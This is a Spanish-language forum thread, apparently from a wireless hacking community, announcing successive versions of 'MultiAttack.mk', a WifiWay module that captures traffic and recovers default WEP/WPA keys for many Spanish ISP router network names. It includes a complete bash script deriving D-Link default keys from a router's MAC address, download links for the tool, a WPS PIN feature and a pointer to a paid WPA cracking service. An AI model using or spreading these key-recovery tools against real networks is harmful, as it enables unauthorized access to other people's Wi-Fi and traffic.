Disponible la nueva version

Multiattack.mk V.1.0.3 beta

- Se han corregido algunos Bugs de la anterior version.
- Se ha añadido encriptacion WPA de WLAN_xxxx (Zixel)
- Se ha añadido un nuevo router de ONOxxxx.
- Se ha cambiado la carpeta donde su guardan los resultados. ( /root/swireless/airoscript/keys )

En el primer post

Saludos

Lotienes con una chincheta unos post mas arriba.

http://foro.elhacker.net/hacking_wireless/clave_por_defecto_wpapsk_de_las_redes_wireless_wlanxxxx_de_los_routers_zyxel-t321100.0.html;msg1587922#msg1587922

Salu2

Hago copy&paste:



Como veis se hace ataque sobre una captura por diccionario con 135 millones de palabras y se usan 400 CPU para el ataque.

yo sigo creyendo que con una buena key no hay diccionario que la saque !!!

...Pero si alguien quiere gastarse 17$ y probarlo, ahí dejo el enlace:

http://www.wpacracker.com

Saludos

 [Actualización 5-Febrero-2011]

MultiAtack.mk V.1.0.2 beta

- Se ha añadido obtención por defecto de WLAN_XXXX y JAZZTEL_XXXX (WPA y WEP).

Modulo para WifiWay2 en el 1º post.

Saludos

Modulo:
MultiAtack.mk V.1.0.1 beta ( obtener las keys por defecto de todas las ESSID conocidas de una captura)
Descripción:
Sirve hacer es un ataque multiple sobre una única captura obteniendo las claves por defecto de todas las  ESSID de esa captura con patrón conocido (WLAN_xx, JAZZTEL_xx, ONOxxxx, WLANxxxxxx, YACOMxxxxxx, WIFIxxxxxx, SpeedTouchxxxxxx, Thomsonxxxxxx y Dlink ) y que tengan un minimo de 4 IV´s

OJO: necesitas tener instalados todos los decripters (wlandecritper, jazzteldecripter,dlinkdecripter,stkeys,wlan4xx,ono4xx)





descarga:
http://www.megaupload.com/?d=PCVHT6UN
 
Saludos

Modulo:
MultiAtack.mk V.1.0.1 beta ( obtener las keys por defecto de todas las ESSID conocidas de una captura)
Descripción:
Sirve hacer es un ataque multiple sobre una única captura obteniendo las claves por defecto de todas las  ESSID de esa captura con patrón conocido (WLAN_xx, JAZZTEL_xx, ONOxxxx, WLANxxxxxx, YACOMxxxxxx, WIFIxxxxxx, SpeedTouchxxxxxx, Thomsonxxxxxx y Dlink ) y que tengan un minimo de 4 IV´s





descarga:
http://www.megaupload.com/?d=8FSSSWJ1

Saludos

Realizada actualización

MultiAtack.mk V.1.0.1 beta

- Se han corregido algunos Bugs de la anterior version.
- Se ha añadido Thomsonxxxxxx
- Se ha añadido encriptacion WEP para SpeedTouch.
- Se a añadido lanzador de "airoscript nuevo wifiway" en el menú (para poder utilizar las capturas realizadas con Multiatack en el Airoscript)

He hecho dos modulos con la nueva version. Uno para WifiWay 2 y otro para Wifiway 1.

Modificado primer post con las actualizaciones.

Saludos

Recupera la clave por defecto de los router Dlink


Surfeando por la red me he encontrado con un proyecto que recupera las claves por defecto de los Routers Dlink.

http://code.google.com/p/dlinkpasswordreminder/

Me ha parecido interesante y se me ha ocurrido hacer este Script para WifiWay.

Yo personalmente no lo he podido probar con ninguna red.
Si alguien lo puede probar y funciona que lo postee.
(así lo implementaré en futuras versiones de MultiAtack)

-- Igual he hecho el tonto un rato...!!!

#!/bin/bash
 
 
 
##############################################################################
# Programa:	dlinkpassremind.sh
# Autor:	M.K. Maese Kamara para Seguridad Wireless y elhacker
# 
# 		Basado en DlinkPasswordReminder.1.0.1, coded by Buterrip
#               http://code.google.com/p/dlinkpasswordreminder
#  
#
##############################################################################
 
dlink_MAC=`echo $1`
cla=""
p=1
 
function errormac {
clear
echo ""
echo "La MAC $dlink_MAC es invalida. Revisela..."
exit
} 
 
# Comprobar longitud de la MAC escrita
if [ ${#dlink_MAC} != 17 ]; then
clear
echo ""
echo "longitud de MAC invalida. Revisela..."
exit
fi
 
while [ $p -le 17 ]; do
 
#leer caracteres de la mMAC
mac=`echo $dlink_MAC|cut  -b $p`
 
puntos[$p]=$mac
 
# Convertir caracteres en minisculas a mayusculas	
	if [ $mac = "a" ]; then
	mac="A"
	fi
	if [ $mac = "b" ]; then
	mac="B"
	fi
	if [ $mac = "c" ]; then
	mac="C"
	fi
	if [ $mac = "d" ]; then
	mac="D"
	fi
	if [ $mac = "e" ]; then
	mac="E"
	fi
	if [ $mac = "f" ]; then
	mac="F"
	fi
 
# Asignar valores según caracter de la mac
	if [ $mac = "0" ]; then
	cla[$p]="X"
	fi
	if [ $mac = "1" ]; then
	cla[$p]="r"
	fi
	if [ $mac = "2" ]; then
	cla[$p]="q"
	fi
	if [ $mac = "3" ]; then
	cla[$p]="a"
	fi
	if [ $mac = "4" ]; then
	cla[$p]="H"
	fi
	if [ $mac = "5" ]; then
	cla[$p]="N"
	fi
	if [ $mac = "6" ]; then
	cla[$p]="p"
	fi
	if [ $mac = "7" ]; then
	cla[$p]="d"
	fi
	if [ $mac = "8" ]; then
	cla[$p]="S"
	fi
	if [ $mac = "9" ]; then
	cla[$p]="y"
	fi
	if [ $mac = "A" ]; then
	cla[$p]="w"
	fi
	if [ $mac = "B" ]; then
	cla[$p]="8"
	fi
	if [ $mac = "C" ]; then
	cla[$p]="6"
	fi
	if [ $mac = "D" ]; then
	cla[$p]="2"
	fi
	if [ $mac = "E" ]; then
	cla[$p]="1"
	fi
	if [ $mac = "F" ]; then
	cla[$p]="5"
	fi
p=$(($p+1))
done
 
 
key=${cla[17]}${cla[1]}${cla[16]}${cla[2]}${cla[14]}${cla[4]}${cla[13]}${cla[5]}${cla[11]}${cla[7]}${cla[10]}${cla[8]}${cla[2]}${cla[10]}${cla[13]}${cla[14]}${cla[17]}${cla[4]}${cla[7]}${cla[16]}
 
#comprobar si MAC introducida es correcta
if [ ${puntos[3]} != ":" ]; then
errormac
fi
if [ ${puntos[6]} != ":" ]; then
errormac
fi
if [ ${puntos[9]} != ":" ]; then
errormac
fi
if [ ${puntos[12]} != ":" ]; then
errormac
fi
if [ ${puntos[15]} != ":" ]; then
errormac
fi
if [ ${#key} != 20 ]; then
errormac
fi
 
clear
 
echo "Script basado en DlinkPasswordReminder.1.0.1 original de Buterrip"
echo ""
echo "Key por defecto para"
echo "Dlink con MAC $dlink_MAC"
echo ""
echo $key
echo "--------------------"
echo "Se ha guardado en el fichero"
echo "/root/swireless/wordlist/KeyDlink_$dlink_MAC"
echo ""
echo " Saludos desde SeguridadWireless.net y elhacker.net"
echo ""
echo $key >> /root/swireless/wordlist/KeyDlink_$dlink_MAC
 
#end
 

Descarga:
http://www.multiupload.com/57RIJSO208

Feliz 2011

Estas seguro que en la opcion 1 seleccionas la tarjeta en modo monitor correctamente?
Por que, para mi que va a ser eso.

Saludos

[Actualización 2-FEBRERO-2012]

Visto lo facil que puede resultar para cualquiera obtener las claves que por defecto suministran las compañias

proveedoras con sus routers desde aquí les recomiendo que cambien sus claves por defecto y

utilicen una buena clave y cifrado WPA.

Agradecimientos:

-  A "USUARIONUEVO"  -> Por la idea de captura selectiva de canales.
-  A "naymenos"      -> Por el reporte de Bugs, idea de Scaneo sin captura y creación del Mini-tuto.
-  A "alist3r"       -> Por dejarme usar su script para convertir HEXA en ASCII
-  A todos los miembros del foro.

MultiAtack.mk ( obtener las keys por defecto de todas las ESSID con patron por defecto conocido de una captura)



Multiattack.mk V.1.0.7 beta

- Corregidos algunos Bugs de la anterior version.
- Se ha cambiado la forma en que se guardan los resultados. Ahora se guarda cada Key obtenida con el NOMBRE y MAC de cada

RED
- En la Autodeteccion de las tarjetas nos muestra las tarjetas en modo managed y modo monitor, para elegir si queremos

montar una nueva tarjeta o trabajar con una que ya tenemos montada.
- Se han cambiado las ventanas de capturas (de konsole a xterm) y se ha añadido autoresolucion (aprovechando parte de

airoscript) de forma que ahora tenemos mas amplitud de vision si hay muchas redes.
- Ahora se puede estar capturando datos y lanzar el ataque sin cerrar la captura cuantas veces queramos.
- En la ventana de resultados se han separado las Redes con ecriptacion WEP de las WPA y se no se muestran las redes

abiertas (solos se informa de cuantas hay)
- Se ha añadido PIN_WPS para por defecto de los routers 00:19:15 de Telefonica(movistar)


Multiattack.mk V.1.0.6 beta

- Corregidos algunos Bugs de la anterior version.
- Se ha cambiado el direcctorio donde se guradan las captuiras para que sea compatible con la nueva version de Airoscript
- Autodetecta la tarjeta y la monta en monitor. (Aunque se ha mantenido la opcion de
  ejecutar Airmon (Opcion 7) y seleccionarla de forma manual), Ademas si detecta mas de 1 tarjeta te da la opcion de elegir

con la que quieras montar en modo monitor.


Multiattack.mk V.1.0.5 beta

- Corregidos algunos Bugs de la anterior version.
- Añadida Funcion Automatica ( Se selecciona el tiempo de captura y canales y
  transcurrido ese tiempo muestra las claves obtenidas por pantalla)
- Autodetecta la tarjeta y la monta en monitor. (Aunque se ha mantenido la opcion de
  ejecutar Airmon y seleccionarla de forma manual)
- Añadidas redes PTV_xxxx (personalmente no he visto ninguna)
- Se muestran la claves obtenidas en HEXA y ASCII ( siempre que sean convertibles)
  Gracias a alist3r
- se ha cambiado el direcctorio donde se crean los diccionarios temporales para no
  interferir con los creados por Airoscript


Multiattack.mk V.1.0.4 beta

- Corregido algunos Bugs de la anterior version.
- Añadida la opción de Scanear sin capturar para ver objetivos.
- Añadida la seleccion de capturas por canales ( ahora se pueden elegir los canales a
  capturar )
- Añadido un mini-tuto.

Multiattack.mk V.1.0.3 beta

- Corregidos algunos Bugs de la anterior version.
- Añadida encriptacion WPA de WLAN_xxxx (Zixel)
- Añadido un nuevo router de ONOxxxx.
- Cambiada la carpeta donde su guardan los resultados. ( /root/swireless/airoscript/keys )
 

MultiAttack.mk V.1.0.2 beta

- Añadida obtención por defecto de WLAN_XXXX y JAZZTEL_XXXX (WPA y WEP)


MultiAttack.mk V.1.0.1 beta

- Corregidos algunos Bugs de la anterior version.
- Añadido Thomsonxxxxxx
- Añadida encriptacion WEP para SpeedTouch.
- Añadido lanzador de "airoscript nuevo wifiway" en el menú (para poder utilizar las capturas realizadas con Multiattack en

el Airoscript)




Para que sirve este Script:

Pues lo que hace es un ataque multiple sobre una única captura obteniendo las claves por defecto de todas las  ESSID de esa

captura con patrón conocido ( WLAN_xxxx, WLAN_xx, JAZZTEL_xxxx, JAZZTEL_xx, ONOxxxx (sólo WEP), WLANxxxxxx, YACOMxxxxxx,

WIFIxxxxxx, SpeedTouchxxxxxx, Thomsonxxxxxx, PTV_xxxx y Dlink ) y que tengan un minimo de 4 IV´s para las ESSID en que se

utiliza diccionario.

En el menú principal tenemos las opciones para poner la tajeta en modo monitor y seleccionarla, iniciar la captura de datos,

iniciar el ataque a ESSID con patrones
conocidos,  iniciar el ataque a ESSID con patrones conocidos sobre redes cuyo ESSID por defecto puede haber sido cambiado,

pero no la clave y,  por ultimo, lanzador de "airoscript nuevo wifiway".













Para la realizacion del script he utilizado partes de codigo del "airoscript.cw" ( seguro que encontrareis bastantes

similitudes ).

He utilizado los mismos directorios de trabajo de "airoscript.cw", por lo que se pueden utilizar las capturas entre ambos

script´s.

Una vez obtenidas las claves, estas se muestran por pantalla y a su vez se guardan en el

directorio/root/swireless/airoscript/keys/ con el NOMBRE y MAC de cada RED 


He hecho un modulo para WIFIWAY 2.0.x que podeis descargar desde:

http://depositfiles.com/files/3oqwwjn76 (version 1.0.7 beta para wifiway 2)
No crea lanzador en el escritorio se ejecuta desde Menu->Wifiway->Cifrados

http://www.megaupload.com/?d=67TB6PIY (version 1.0.6 beta para wifiway 2)
http://www.megaupload.com/?d=M360GU1B (version 1.0.5 beta para wifiway 2)
http://www.megaupload.com/?d=BNDTJK7Y (version 1.0.4 beta para wifiway 2)
http://www.megaupload.com/?d=Y4FQK1L0 (version 1.0.3 beta para wifiway 2)
http://www.megaupload.com/?d=G2C17XXW (version 1.0.2 beta para wifiway 2)
http://www.megaupload.com/?d=8FSSSWJ1 (version 1.0.1 beta para wifiway 2)
http://www.megaupload.com/?d=6QNDREVN (version 1.0.0 beta para wifiway 2)
Y un modulo para WIFIWAY 1 que podeis descargar desde:

http://www.megaupload.com/?d=PCVHT6UN (version 1.0.1 beta para wifiway 1)
Saludos.